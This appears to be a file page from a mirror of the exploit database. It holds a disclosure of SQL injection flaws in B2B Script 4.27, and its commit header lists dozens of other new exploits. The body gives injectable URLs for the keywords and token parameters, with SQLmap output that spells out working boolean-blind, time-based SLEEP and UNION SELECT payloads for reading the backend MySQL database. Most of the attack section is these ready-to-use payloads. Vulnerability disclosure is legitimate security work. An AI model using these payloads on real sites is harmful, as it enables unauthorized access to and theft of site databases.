bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41116.txt
Offensive Security ef112ace5d DB: 2017-01-19 
27 new exploits

SentryHD 02.01.12e - Privilege Escalation

Linux/x86-64 - mkdir Shellcode (25 bytes)

ownrs blog beta3 - SQL Injection / Cross-Site Scripting
OwnRS blog beta3 - SQL Injection / Cross-Site Scripting

Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion
Dodo's Quiz Script 1.1 - Local File Inclusion

Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection
Mambo Component SOBI2 RC 2.8.2 - SQL Injection

Joomla! Component com_pcchess - (game_id) Blind SQL Injection
Joomla! Component com_pcchess - Blind SQL Injection
Medical Clinic Website Script - SQL Injection
Fileserve Clone Script - Authentication Bypass
Auction Website Script - SQL Injection
Wetransfer Clone Script - Authentication Bypass
Finance Website Script - SQL Injection
Justdial Clone Script - Authentication Bypass
Business Directory Script - SQL Injection
Buy and Sell Market Place Software - SQL Injection
Dentist Website Script - SQL Injection
Manufacturer Website Design Script - SQL Injection
Micro Blog Script - SQL Injection
My Private Tutor Website Builder Script - SQL Injection
NGO Directory Script - SQL Injection
Yoga and Fitness Website Script - SQL Injection
NGO Website Script - SQL Injection
Questions and Answers Script 1.1.3 - SQL Injection
Online Mobile Recharge Script - SQL Injection
Clone of Oddee Script 1.1.3 - SQL Injection
Online Printing Business Clone Script - SQL Injection
Online Tshirt Design Script - SQL Injection
Shiksha Educational Website Script - SQL Injection
Study Abroad Educational Website Script - SQL Injection
Courier Management System - SQL Injection
Flippa Website Script - SQL Injection
B2B Script 4.27 - SQL Injection
2017-01-19 05:01:18 +00:00

54 lines
1.8 KiB
Text
Executable file
Raw Blame History

# Vulnerability: B2B Script v4.27 - SQL Injection
# Date: 18.01.2017
# Software link: http://itechscripts.com/b2b-script/
# Demo: http://b2b.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawidmorawski1990@gmail.com
#######################################
1. Description
An attacker can exploit this vulnerability to read from the database.
2. SQL Injection / Proof of Concept:
http://localhost/[PATH]/search.php?keywords=[SQL]
SQLmap outout:
Parameter: keywords (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: keywords=-7908') OR 3641=3641#
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: keywords=Products') UNION ALL SELECT
NULL,CONCAT(0x716b7a7871,0x68634473486965586e6b57754358736b487a43564c6963646e556549454e476177776a5a6a7a4c4c,0x71767a7a71)#
---
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
#########################################
http://localhost/[PATH]/catcompany.php?token=[SQL]
SQLmap outout:
Parameter: token (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND 9125=9125 AND
'HhOm'='HhOm
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND SLEEP(5) AND
'dWKJ'='dWKJ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: token=-7417' UNION ALL SELECT
NULL,CONCAT(0x7171707071,0x6a6c6d484f58726e48446167417a66756464445941464844416856527a634a704f4b79647a494654,0x716b786271),NULL,NULL,NULL,NULL--
aNXq
Reference in a new issue View git blame Copy permalink